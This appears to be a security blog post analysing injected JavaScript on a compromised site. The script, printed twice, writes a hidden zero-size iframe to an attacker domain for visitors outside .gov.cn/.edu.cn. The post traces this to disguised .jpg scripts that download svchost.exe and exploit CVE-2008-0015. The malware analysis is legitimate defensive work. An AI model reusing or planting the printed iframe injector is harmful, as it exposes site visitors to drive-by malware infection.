var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0){
document.writeln("<iframe src=http://bybyybyb.com/aa/a1a.htm?4 width=0 height=0></iframe>");
}
document.write ('<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/985098/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/985098/ystat.gif"/></a></noscript>');
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0){
document.writeln("<iframe src=http://bybyybyb.com/aa/a1a.htm?4 width=0 height=0></iframe>");
}
document.write ('<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/985098/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/985098/ystat.gif"/></a></noscript>');
From here, we can see that it is loading an iFrame to bybyybyb.com (59.34.197.154 - AS4134), based on whether tmpdomain is equal to zero (which is based on whether or not the URL matches any of the items in the arydomain array). This iFrame, then loads another iframe to index.htm which contains;
<html>
<body>
<div id="DivID">
<script src='go.jpg'></script>
<script src='go1.jpg'></script>
</body>
</html>
<body>
<div id="DivID">
<script src='go.jpg'></script>
<script src='go1.jpg'></script>
</body>
</html>
You'll not be surprised to learn that these .jpg files, aren't infact, .jpg files. go.jpg contains the shell code;
If we run this through Wepawet (saves us alot of time), we see it grabs a file called svchost.exe from z999hu.cn (121.14.218.162 - AS4134), MD5: 78ffb67eb9e8ec2886fcb5e32c916333;
http://wepawet.cs.ucsb.edu/view.php?hash=92b82fa85cc9fb0206b7eca725c3ce42&type=js
Detection for this is pretty good, with 28/41 vendors currently detecting it;
http://www.virustotal.com/analisis/ebcf13901c7d5a12dc0a2f4e5e588276a9dfc1693672b61d1339933f77e0b04b-1247156133
go1.jpg attempts a buffer overflow (CVE-2008-0015), and detection is sadly, rubbish;
http://www.virustotal.com/analisis/673d9d2ff901f08991354fe28798bfe7f18346492d1e5987caf788e4da79eee5-1247118784
References:
vURL Online - myb88.com/t.js
http://vurl.mysteryfcm.co.uk/?url=713642
hpHosts - 261 Domains listed resolving to: 59.34.197.
http://hosts-file.net/pest.asp?show=59.34.197.
Microsoft Security Advisory (972890) - Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/972890.mspx
Google Diagnostic - AS4134
http://www.google.com/safebrowsing/diagnostic?site=AS:4134&hl=en
IE 0day exploit domains (constantly updated)
http://isc.sans.org/diary.php?storyid=6739
IE (msvidctl.dll) to 0-day attack (Google translation)
http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=IE(msvidctl.dll)+%A4%D8%A4%CE+0-day+attack
New MS 0-day ActiveX (MSVidCtl dll exploit)
http://infosec20.blogspot.com/2009/07/new-ms-0-day-activex-msvidctl-dll.html
No comments:
Post a Comment